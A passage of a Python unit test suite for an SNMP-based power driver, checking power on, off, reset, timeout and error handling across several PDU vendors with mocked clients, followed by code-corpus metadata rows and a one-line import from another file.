driver.value_power_on)
def test_power_off_snmp_set_failure(self, mock_get_client):
# Ensure SNMP failure exceptions raised during a power off set
# operation are propagated
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.set.side_effect = self._get_snmp_failure()
self.assertRaises(exception.SNMPFailure,
driver.power_off)
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_off)
def test_power_on_snmp_get_failure(self, mock_get_client):
# Ensure SNMP failure exceptions raised during a power on get operation
# are propagated
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = self._get_snmp_failure()
self.assertRaises(exception.SNMPFailure,
driver.power_on)
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_on)
mock_client.get.assert_called_once_with(driver._snmp_oid())
def test_power_off_snmp_get_failure(self, mock_get_client):
# Ensure SNMP failure exceptions raised during a power off get
# operation are propagated
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = self._get_snmp_failure()
self.assertRaises(exception.SNMPFailure,
driver.power_off)
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_off)
mock_client.get.assert_called_once_with(driver._snmp_oid())
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_on_timeout(self, mock_sleep, mock_get_client):
# Ensure that a power on consistency poll timeout causes an error
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.value_power_off
pstate = driver.power_on()
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_on)
attempts = CONF.snmp.power_timeout // driver.retry_interval
calls = [mock.call(driver._snmp_oid())] * attempts
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.ERROR, pstate)
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_off_timeout(self, mock_sleep, mock_get_client):
# Ensure that a power off consistency poll timeout causes an error
mock_client = mock_get_client.return_value
CONF.snmp.power_timeout = 5
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.value_power_on
pstate = driver.power_off()
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_off)
attempts = CONF.snmp.power_timeout // driver.retry_interval
calls = [mock.call(driver._snmp_oid())] * attempts
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.ERROR, pstate)
def test_power_reset(self, mock_get_client):
# Ensure the device is reset correctly
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = [driver.value_power_off,
driver.value_power_on]
pstate = driver.power_reset()
calls = [mock.call(driver._snmp_oid(), driver.value_power_off),
mock.call(driver._snmp_oid(), driver.value_power_on)]
mock_client.set.assert_has_calls(calls)
calls = [mock.call(driver._snmp_oid())] * 2
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.POWER_ON, pstate)
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_reset_off_delay(self, mock_sleep, mock_get_client):
# Ensure driver waits for the power off state change following a power
# reset
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = [driver.value_power_on,
driver.value_power_off,
driver.value_power_on]
pstate = driver.power_reset()
calls = [mock.call(driver._snmp_oid(), driver.value_power_off),
mock.call(driver._snmp_oid(), driver.value_power_on)]
mock_client.set.assert_has_calls(calls)
calls = [mock.call(driver._snmp_oid())] * 3
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.POWER_ON, pstate)
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_reset_on_delay(self, mock_sleep, mock_get_client):
# Ensure driver waits for the power on state change following a power
# reset
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = [driver.value_power_off,
driver.value_power_off,
driver.value_power_on]
pstate = driver.power_reset()
calls = [mock.call(driver._snmp_oid(), driver.value_power_off),
mock.call(driver._snmp_oid(), driver.value_power_on)]
mock_client.set.assert_has_calls(calls)
calls = [mock.call(driver._snmp_oid())] * 3
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.POWER_ON, pstate)
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_reset_off_delay_on_delay(self, mock_sleep, mock_get_client):
# Ensure driver waits for both state changes following a power reset
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = [driver.value_power_on,
driver.value_power_off,
driver.value_power_off,
driver.value_power_on]
pstate = driver.power_reset()
calls = [mock.call(driver._snmp_oid(), driver.value_power_off),
mock.call(driver._snmp_oid(), driver.value_power_on)]
mock_client.set.assert_has_calls(calls)
calls = [mock.call(driver._snmp_oid())] * 4
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.POWER_ON, pstate)
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_reset_off_invalid_state(self, mock_sleep, mock_get_client):
# Ensure driver retries when querying unexpected states following a
# power off during a reset
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.return_value = 42
pstate = driver.power_reset()
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_off)
attempts = CONF.snmp.power_timeout // driver.retry_interval
calls = [mock.call(driver._snmp_oid())] * attempts
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.ERROR, pstate)
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_reset_on_invalid_state(self, mock_sleep, mock_get_client):
# Ensure driver retries when querying unexpected states following a
# power on during a reset
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
attempts = CONF.snmp.power_timeout // driver.retry_interval
mock_client.get.side_effect = ([driver.value_power_off] +
[42] * attempts)
pstate = driver.power_reset()
calls = [mock.call(driver._snmp_oid(), driver.value_power_off),
mock.call(driver._snmp_oid(), driver.value_power_on)]
mock_client.set.assert_has_calls(calls)
calls = [mock.call(driver._snmp_oid())] * (1 + attempts)
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.ERROR, pstate)
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_reset_off_timeout(self, mock_sleep, mock_get_client):
# Ensure that a power off consistency poll timeout during a reset
# causes an error
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.value_power_on
pstate = driver.power_reset()
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_off)
attempts = CONF.snmp.power_timeout // driver.retry_interval
calls = [mock.call(driver._snmp_oid())] * attempts
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.ERROR, pstate)
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_reset_on_timeout(self, mock_sleep, mock_get_client):
# Ensure that a power on consistency poll timeout during a reset
# causes an error
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
attempts = CONF.snmp.power_timeout // driver.retry_interval
mock_client.get.side_effect = ([driver.value_power_off] *
(1 + attempts))
pstate = driver.power_reset()
calls = [mock.call(driver._snmp_oid(), driver.value_power_off),
mock.call(driver._snmp_oid(), driver.value_power_on)]
mock_client.set.assert_has_calls(calls)
calls = [mock.call(driver._snmp_oid())] * (1 + attempts)
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.ERROR, pstate)
def test_power_reset_off_snmp_set_failure(self, mock_get_client):
# Ensure SNMP failure exceptions raised during a reset power off set
# operation are propagated
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.set.side_effect = self._get_snmp_failure()
self.assertRaises(exception.SNMPFailure,
driver.power_reset)
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_off)
self.assertFalse(mock_client.get.called)
def test_power_reset_off_snmp_get_failure(self, mock_get_client):
# Ensure SNMP failure exceptions raised during a reset power off get
# operation are propagated
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = self._get_snmp_failure()
self.assertRaises(exception.SNMPFailure,
driver.power_reset)
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_off)
mock_client.get.assert_called_once_with(driver._snmp_oid())
def test_power_reset_on_snmp_set_failure(self, mock_get_client):
# Ensure SNMP failure exceptions raised during a reset power on set
# operation are propagated
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.set.side_effect = [None, self._get_snmp_failure()]
mock_client.get.return_value = driver.value_power_off
self.assertRaises(exception.SNMPFailure,
driver.power_reset)
calls = [mock.call(driver._snmp_oid(), driver.value_power_off),
mock.call(driver._snmp_oid(), driver.value_power_on)]
mock_client.set.assert_has_calls(calls)
mock_client.get.assert_called_once_with(driver._snmp_oid())
@mock.patch.object(time, 'sleep', autospec=True)
def test_power_reset_delay_option(self, mock_sleep, mock_get_client):
# Test for 'reboot_delay' config option
self.config(reboot_delay=5, group='snmp')
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = [driver.value_power_off,
driver.value_power_on]
pstate = driver.power_reset()
calls = [mock.call(driver._snmp_oid(), driver.value_power_off),
mock.call(driver._snmp_oid(), driver.value_power_on)]
mock_client.set.assert_has_calls(calls)
calls = [mock.call(driver._snmp_oid())] * 2
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.POWER_ON, pstate)
mock_sleep.assert_called_once_with(5)
def test_power_reset_on_snmp_get_failure(self, mock_get_client):
# Ensure SNMP failure exceptions raised during a reset power on get
# operation are propagated
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = [driver.value_power_off,
self._get_snmp_failure()]
self.assertRaises(exception.SNMPFailure,
driver.power_reset)
calls = [mock.call(driver._snmp_oid(), driver.value_power_off),
mock.call(driver._snmp_oid(), driver.value_power_on)]
mock_client.set.assert_has_calls(calls)
calls = [mock.call(driver._snmp_oid()), mock.call(driver._snmp_oid())]
mock_client.get.assert_has_calls(calls)
def _test_simple_device_power_state_on(self, snmp_driver, mock_get_client):
# Ensure a simple device driver queries power on correctly
mock_client = mock_get_client.return_value
self._set_snmp_driver(snmp_driver)
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.value_power_on
pstate = driver.power_state()
mock_client.get.assert_called_once_with(driver._snmp_oid())
self.assertEqual(states.POWER_ON, pstate)
def _test_simple_device_power_state_off(self, snmp_driver,
mock_get_client):
# Ensure a simple device driver queries power off correctly
mock_client = mock_get_client.return_value
self._set_snmp_driver(snmp_driver)
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.value_power_off
pstate = driver.power_state()
mock_client.get.assert_called_once_with(driver._snmp_oid())
self.assertEqual(states.POWER_OFF, pstate)
def _test_simple_device_power_on(self, snmp_driver, mock_get_client):
# Ensure a simple device driver powers on correctly
mock_client = mock_get_client.return_value
self._set_snmp_driver(snmp_driver)
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.value_power_on
pstate = driver.power_on()
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_on)
mock_client.get.assert_called_once_with(driver._snmp_oid())
self.assertEqual(states.POWER_ON, pstate)
def _test_simple_device_power_off(self, snmp_driver, mock_get_client):
# Ensure a simple device driver powers off correctly
mock_client = mock_get_client.return_value
self._set_snmp_driver(snmp_driver)
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.value_power_off
pstate = driver.power_off()
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_off)
mock_client.get.assert_called_once_with(driver._snmp_oid())
self.assertEqual(states.POWER_OFF, pstate)
def _test_simple_device_power_reset(self, snmp_driver, mock_get_client):
# Ensure a simple device driver resets correctly
mock_client = mock_get_client.return_value
self._set_snmp_driver(snmp_driver)
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = [driver.value_power_off,
driver.value_power_on]
pstate = driver.power_reset()
calls = [mock.call(driver._snmp_oid(), driver.value_power_off),
mock.call(driver._snmp_oid(), driver.value_power_on)]
mock_client.set.assert_has_calls(calls)
calls = [mock.call(driver._snmp_oid())] * 2
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.POWER_ON, pstate)
def test_apc_snmp_objects(self, mock_get_client):
# Ensure the correct SNMP object OIDs and values are used by the APC
# driver
self._update_driver_info(snmp_driver="apc",
snmp_outlet="3")
driver = snmp._get_driver(self.node)
oid = (1, 3, 6, 1, 4, 1, 318, 1, 1, 4, 4, 2, 1, 3, 3)
self.assertEqual(oid, driver._snmp_oid())
self.assertEqual(1, driver.value_power_on)
self.assertEqual(2, driver.value_power_off)
def test_apc_power_state_on(self, mock_get_client):
self._test_simple_device_power_state_on('apc', mock_get_client)
def test_apc_power_state_off(self, mock_get_client):
self._test_simple_device_power_state_off('apc', mock_get_client)
def test_apc_power_on(self, mock_get_client):
self._test_simple_device_power_on('apc', mock_get_client)
def test_apc_power_off(self, mock_get_client):
self._test_simple_device_power_off('apc', mock_get_client)
def test_apc_power_reset(self, mock_get_client):
self._test_simple_device_power_reset('apc', mock_get_client)
def test_apc_masterswitch_snmp_objects(self, mock_get_client):
# Ensure the correct SNMP object OIDs and values are used by the APC
# masterswitch driver
self._update_driver_info(snmp_driver="apc_masterswitch",
snmp_outlet="6")
driver = snmp._get_driver(self.node)
oid = (1, 3, 6, 1, 4, 1, 318, 1, 1, 4, 4, 2, 1, 3, 6)
self.assertEqual(oid, driver._snmp_oid())
self.assertEqual(1, driver.value_power_on)
self.assertEqual(2, driver.value_power_off)
def test_apc_masterswitch_power_state_on(self, mock_get_client):
self._test_simple_device_power_state_on('apc_masterswitch',
mock_get_client)
def test_apc_masterswitch_power_state_off(self, mock_get_client):
self._test_simple_device_power_state_off('apc_masterswitch',
mock_get_client)
def test_apc_masterswitch_power_on(self, mock_get_client):
self._test_simple_device_power_on('apc_masterswitch', mock_get_client)
def test_apc_masterswitch_power_off(self, mock_get_client):
self._test_simple_device_power_off('apc_masterswitch', mock_get_client)
def test_apc_masterswitch_power_reset(self, mock_get_client):
self._test_simple_device_power_reset('apc_masterswitch',
mock_get_client)
def test_apc_masterswitchplus_snmp_objects(self, mock_get_client):
# Ensure the correct SNMP object OIDs and values are used by the APC
# masterswitchplus driver
self._update_driver_info(snmp_driver="apc_masterswitchplus",
snmp_outlet="6")
driver = snmp._get_driver(self.node)
oid = (1, 3, 6, 1, 4, 1, 318, 1, 1, 6, 5, 1, 1, 5, 6)
self.assertEqual(oid, driver._snmp_oid())
self.assertEqual(1, driver.value_power_on)
self.assertEqual(3, driver.value_power_off)
def test_apc_masterswitchplus_power_state_on(self, mock_get_client):
self._test_simple_device_power_state_on('apc_masterswitchplus',
mock_get_client)
def test_apc_masterswitchplus_power_state_off(self, mock_get_client):
self._test_simple_device_power_state_off('apc_masterswitchplus',
mock_get_client)
def test_apc_masterswitchplus_power_on(self, mock_get_client):
self._test_simple_device_power_on('apc_masterswitchplus',
mock_get_client)
def test_apc_masterswitchplus_power_off(self, mock_get_client):
self._test_simple_device_power_off('apc_masterswitchplus',
mock_get_client)
def test_apc_masterswitchplus_power_reset(self, mock_get_client):
self._test_simple_device_power_reset('apc_masterswitchplus',
mock_get_client)
def test_apc_rackpdu_snmp_objects(self, mock_get_client):
# Ensure the correct SNMP object OIDs and values are used by the APC
# rackpdu driver
self._update_driver_info(snmp_driver="apc_rackpdu",
snmp_outlet="6")
driver = snmp._get_driver(self.node)
oid = (1, 3, 6, 1, 4, 1, 318, 1, 1, 12, 3, 3, 1, 1, 4, 6)
self.assertEqual(oid, driver._snmp_oid())
self.assertEqual(1, driver.value_power_on)
self.assertEqual(2, driver.value_power_off)
def test_apc_rackpdu_power_state_on(self, mock_get_client):
self._test_simple_device_power_state_on('apc_rackpdu', mock_get_client)
def test_apc_rackpdu_power_state_off(self, mock_get_client):
self._test_simple_device_power_state_off('apc_rackpdu',
mock_get_client)
def test_apc_rackpdu_power_on(self, mock_get_client):
self._test_simple_device_power_on('apc_rackpdu', mock_get_client)
def test_apc_rackpdu_power_off(self, mock_get_client):
self._test_simple_device_power_off('apc_rackpdu', mock_get_client)
def test_apc_rackpdu_power_reset(self, mock_get_client):
self._test_simple_device_power_reset('apc_rackpdu', mock_get_client)
def test_aten_snmp_objects(self, mock_get_client):
# Ensure the correct SNMP object OIDs and values are used by the
# Aten driver
self._update_driver_info(snmp_driver="aten",
snmp_outlet="3")
driver = snmp._get_driver(self.node)
oid = (1, 3, 6, 1, 4, 1, 21317, 1, 3, 2, 2, 2, 2, 3, 0)
self.assertEqual(oid, driver._snmp_oid())
self.assertEqual(2, driver.value_power_on)
self.assertEqual(1, driver.value_power_off)
def test_aten_power_state_on(self, mock_get_client):
self._test_simple_device_power_state_on('aten', mock_get_client)
def test_aten_power_state_off(self, mock_get_client):
self._test_simple_device_power_state_off('aten', mock_get_client)
def test_aten_power_on(self, mock_get_client):
self._test_simple_device_power_on('aten', mock_get_client)
def test_aten_power_off(self, mock_get_client):
self._test_simple_device_power_off('aten', mock_get_client)
def test_aten_power_reset(self, mock_get_client):
self._test_simple_device_power_reset('aten', mock_get_client)
def test_cyberpower_snmp_objects(self, mock_get_client):
# Ensure the correct SNMP object OIDs and values are used by the
# CyberPower driver
self._update_driver_info(snmp_driver="cyberpower",
snmp_outlet="3")
driver = snmp._get_driver(self.node)
oid = (1, 3, 6, 1, 4, 1, 3808, 1, 1, 3, 3, 3, 1, 1, 4, 3)
self.assertEqual(oid, driver._snmp_oid())
self.assertEqual(1, driver.value_power_on)
self.assertEqual(2, driver.value_power_off)
def test_cyberpower_power_state_on(self, mock_get_client):
self._test_simple_device_power_state_on('cyberpower', mock_get_client)
def test_cyberpower_power_state_off(self, mock_get_client):
self._test_simple_device_power_state_off('cyberpower', mock_get_client)
def test_cyberpower_power_on(self, mock_get_client):
self._test_simple_device_power_on('cyberpower', mock_get_client)
def test_cyberpower_power_off(self, mock_get_client):
self._test_simple_device_power_off('cyberpower', mock_get_client)
def test_cyberpower_power_reset(self, mock_get_client):
self._test_simple_device_power_reset('cyberpower', mock_get_client)
def test_teltronix_snmp_objects(self, mock_get_client):
# Ensure the correct SNMP object OIDs and values are used by the
# Teltronix driver
self._update_driver_info(snmp_driver="teltronix",
snmp_outlet="3")
driver = snmp._get_driver(self.node)
oid = (1, 3, 6, 1, 4, 1, 23620, 1, 2, 2, 1, 4, 3)
self.assertEqual(oid, driver._snmp_oid())
self.assertEqual(2, driver.value_power_on)
self.assertEqual(1, driver.value_power_off)
def test_teltronix_power_state_on(self, mock_get_client):
self._test_simple_device_power_state_on('teltronix', mock_get_client)
def test_teltronix_power_state_off(self, mock_get_client):
self._test_simple_device_power_state_off('teltronix', mock_get_client)
def test_teltronix_power_on(self, mock_get_client):
self._test_simple_device_power_on('teltronix', mock_get_client)
def test_teltronix_power_off(self, mock_get_client):
self._test_simple_device_power_off('teltronix', mock_get_client)
def test_teltronix_power_reset(self, mock_get_client):
self._test_simple_device_power_reset('teltronix', mock_get_client)
def test_eaton_power_snmp_objects(self, mock_get_client):
# Ensure the correct SNMP object OIDs and values are used by the Eaton
# Power driver
self._update_driver_info(snmp_driver="eatonpower",
snmp_outlet="3")
driver = snmp._get_driver(self.node)
status_oid = (1, 3, 6, 1, 4, 1, 534, 6, 6, 7, 6, 6, 1, 2, 3)
poweron_oid = (1, 3, 6, 1, 4, 1, 534, 6, 6, 7, 6, 6, 1, 3, 3)
poweroff_oid = (1, 3, 6, 1, 4, 1, 534, 6, 6, 7, 6, 6, 1, 4, 3)
self.assertEqual(status_oid, driver._snmp_oid(driver.oid_status))
self.assertEqual(poweron_oid, driver._snmp_oid(driver.oid_poweron))
self.assertEqual(poweroff_oid, driver._snmp_oid(driver.oid_poweroff))
self.assertEqual(0, driver.status_off)
self.assertEqual(1, driver.status_on)
self.assertEqual(2, driver.status_pending_off)
self.assertEqual(3, driver.status_pending_on)
def test_eaton_power_power_state_on(self, mock_get_client):
# Ensure the Eaton Power driver queries on correctly
mock_client = mock_get_client.return_value
self._set_snmp_driver("eatonpower")
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.status_on
pstate = driver.power_state()
mock_client.get.assert_called_once_with(
driver._snmp_oid(driver.oid_status))
self.assertEqual(states.POWER_ON, pstate)
def test_eaton_power_power_state_off(self, mock_get_client):
# Ensure the Eaton Power driver queries off correctly
mock_client = mock_get_client.return_value
self._set_snmp_driver("eatonpower")
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.status_off
pstate = driver.power_state()
mock_client.get.assert_called_once_with(
driver._snmp_oid(driver.oid_status))
self.assertEqual(states.POWER_OFF, pstate)
def test_eaton_power_power_state_pending_off(self, mock_get_client):
# Ensure the Eaton Power driver queries pending off correctly
mock_client = mock_get_client.return_value
self._set_snmp_driver("eatonpower")
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.status_pending_off
pstate = driver.power_state()
mock_client.get.assert_called_once_with(
driver._snmp_oid(driver.oid_status))
self.assertEqual(states.POWER_ON, pstate)
def test_eaton_power_power_state_pending_on(self, mock_get_client):
# Ensure the Eaton Power driver queries pending on correctly
mock_client = mock_get_client.return_value
self._set_snmp_driver("eatonpower")
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.status_pending_on
pstate = driver.power_state()
mock_client.get.assert_called_once_with(
driver._snmp_oid(driver.oid_status))
self.assertEqual(states.POWER_OFF, pstate)
def test_eaton_power_power_on(self, mock_get_client):
# Ensure the Eaton Power driver powers on correctly
mock_client = mock_get_client.return_value
self._set_snmp_driver("eatonpower")
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.status_on
pstate = driver.power_on()
mock_client.set.assert_called_once_with(
driver._snmp_oid(driver.oid_poweron), driver.value_power_on)
mock_client.get.assert_called_once_with(
driver._snmp_oid(driver.oid_status))
self.assertEqual(states.POWER_ON, pstate)
def test_eaton_power_power_off(self, mock_get_client):
# Ensure the Eaton Power driver powers off correctly
mock_client = mock_get_client.return_value
self._set_snmp_driver("eatonpower")
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.status_off
pstate = driver.power_off()
mock_client.set.assert_called_once_with(
driver._snmp_oid(driver.oid_poweroff), driver.value_power_off)
mock_client.get.assert_called_once_with(
driver._snmp_oid(driver.oid_status))
self.assertEqual(states.POWER_OFF, pstate)
def test_eaton_power_power_reset(self, mock_get_client):
# Ensure the Eaton Power driver resets correctly
mock_client = mock_get_client.return_value
self._set_snmp_driver("eatonpower")
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = [driver.status_off, driver.status_on]
pstate = driver.power_reset()
calls = [mock.call(driver._snmp_oid(driver.oid_poweroff),
driver.value_power_off),
mock.call(driver._snmp_oid(driver.oid_poweron),
driver.value_power_on)]
mock_client.set.assert_has_calls(calls)
calls = [mock.call(driver._snmp_oid(driver.oid_status))] * 2
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.POWER_ON, pstate)
@mock.patch.object(snmp, '_get_driver', autospec=True)
class SNMPDriverTestCase(db_base.DbTestCase):
"""SNMP power driver interface tests.
In this test case, the SNMP power driver interface is exercised. The
device-specific SNMP driver is mocked to allow various error cases to be
tested.
"""
def setUp(self):
super(SNMPDriverTestCase, self).setUp()
mgr_utils.mock_the_extension_manager(driver='fake_snmp')
self.node = obj_utils.create_test_node(self.context,
driver='fake_snmp',
driver_info=INFO_DICT)
def _get_snmp_failure(self):
return exception.SNMPFailure(operation='test-operation',
error='test-error')
def test_get_properties(self, mock_get_driver):
expected = snmp.COMMON_PROPERTIES
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertEqual(expected, task.driver.get_properties())
def test_get_power_state_on(self, mock_get_driver):
mock_driver = mock_get_driver.return_value
mock_driver.power_state.return_value = states.POWER_ON
with task_manager.acquire(self.context, self.node.uuid) as task:
pstate = task.driver.power.get_power_state(task)
mock_driver.power_state.assert_called_once_with()
self.assertEqual(states.POWER_ON, pstate)
def test_get_power_state_off(self, mock_get_driver):
mock_driver = mock_get_driver.return_value
mock_driver.power_state.return_value = states.POWER_OFF
with task_manager.acquire(self.context, self.node.uuid) as task:
pstate = task.driver.power.get_power_state(task)
mock_driver.power_state.assert_called_once_with()
self.assertEqual(states.POWER_OFF, pstate)
def test_get_power_state_error(self, mock_get_driver):
mock_driver = mock_get_driver.return_value
mock_driver.power_state.return_value = states.ERROR
with task_manager.acquire(self.context, self.node.uuid) as task:
pstate = task.driver.power.get_power_state(task)
mock_driver.power_state.assert_called_once_with()
self.assertEqual(states.ERROR, pstate)
def test_get_power_state_snmp_failure(self, mock_get_driver):
mock_driver = mock_get_driver.return_value
mock_driver.power_state.side_effect = self._get_snmp_failure()
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(exception.SNMPFailure,
task.driver.power.get_power_state, task)
mock_driver.power_state.assert_called_once_with()
def test_set_power_state_on(self, mock_get_driver):
mock_driver = mock_get_driver.return_value
mock_driver.power_on.return_value = states.POWER_ON
with task_manager.acquire(self.context, self.node.uuid) as task:
task.driver.power.set_power_state(task, states.POWER_ON)
mock_driver.power_on.assert_called_once_with()
def test_set_power_state_off(self, mock_get_driver):
mock_driver = mock_get_driver.return_value
mock_driver.power_off.return_value = states.POWER_OFF
with task_manager.acquire(self.context, self.node.uuid) as task:
task.driver.power.set_power_state(task, states.POWER_OFF)
mock_driver.power_off.assert_called_once_with()
def test_set_power_state_error(self, mock_get_driver):
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.power.set_power_state,
task, states.ERROR)
def test_set_power_state_on_snmp_failure(self, mock_get_driver):
mock_driver = mock_get_driver.return_value
mock_driver.power_on.side_effect = self._get_snmp_failure()
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(exception.SNMPFailure,
task.driver.power.set_power_state,
task, states.POWER_ON)
mock_driver.power_on.assert_called_once_with()
def test_set_power_state_off_snmp_failure(self, mock_get_driver):
mock_driver = mock_get_driver.return_value
mock_driver.power_off.side_effect = self._get_snmp_failure()
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(exception.SNMPFailure,
task.driver.power.set_power_state,
task, states.POWER_OFF)
mock_driver.power_off.assert_called_once_with()
def test_set_power_state_on_timeout(self, mock_get_driver):
mock_driver = mock_get_driver.return_value
mock_driver.power_on.return_value = states.ERROR
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(exception.PowerStateFailure,
task.driver.power.set_power_state,
task, states.POWER_ON)
mock_driver.power_on.assert_called_once_with()
def test_set_power_state_off_timeout(self, mock_get_driver):
mock_driver = mock_get_driver.return_value
mock_driver.power_off.return_value = states.ERROR
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(exception.PowerStateFailure,
task.driver.power.set_power_state,
task, states.POWER_OFF)
mock_driver.power_off.assert_called_once_with()
def test_reboot(self, mock_get_driver):
mock_driver = mock_get_driver.return_value
mock_driver.power_reset.return_value = states.POWER_ON
with task_manager.acquire(self.context, self.node.uuid) as task:
task.driver.power.reboot(task)
mock_driver.power_reset.assert_called_once_with()
def test_reboot_snmp_failure(self, mock_get_driver):
mock_driver = mock_get_driver.return_value
mock_driver.power_reset.side_effect = self._get_snmp_failure()
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(exception.SNMPFailure,
task.driver.power.reboot, task)
mock_driver.power_reset.assert_called_once_with()
def test_reboot_timeout(self, mock_get_driver):
mock_driver = mock_get_driver.return_value
mock_driver.power_reset.return_value = states.ERROR
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(exception.PowerStateFailure,
task.driver.power.reboot, task)
mock_driver.power_reset.assert_called_once_with()
| 48.908807 | 79 | 0.671777 | 8,108 | 62,750 | 4.828564 | 0.038481 | 0.033614 | 0.053129 | 0.034227 | 0.905006 | 0.887688 | 0.869349 | 0.854355 | 0.827075 | 0.79553 | 0 | 0.006509 | 0.243506 | 62,750 | 1,282 | 80 | 48.946958 | 0.818222 | 0.090853 | 0 | 0.64965 | 0 | 0 | 0.033309 | 0.005941 | 0 | 0 | 0 | 0 | 0.226226 | 1 | 0.142142 | false | 0.003003 | 0.014014 | 0.003003 | 0.163163 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1c8de328f893e7e0d60815f5880ec363719f9035 | 31 | py | Python | sarafi/lcg.py | supakeen/sarafi | 6a7177ab0cbec3986570c415b84f794159905862 | [
"MIT"
] | null | null | null | sarafi/lcg.py | supakeen/sarafi | 6a7177ab0cbec3986570c415b84f794159905862 | [
"MIT"
] | null | null | null | sarafi/lcg.py | supakeen/sarafi | 6a7177ab0cbec3986570c415b84f794159905862 | [
"MIT"
] | null | null | null | import sarafi._lib.lcg as _lcg
| 15.5 | 30 | 0.806452 | 6 | 31 | 3.833333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 31 | 1 | 31 | 31 | 0.851852 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
98bccc5977adbaf6dbdbdea603d9c8c47d826aac | 74 | py | Python | anime_dl/common/__init__.py | tiagotda/anime-dl | d3c114faaa7586b4e1111efa2cf79d4640d4f6a9 | [
"MIT"
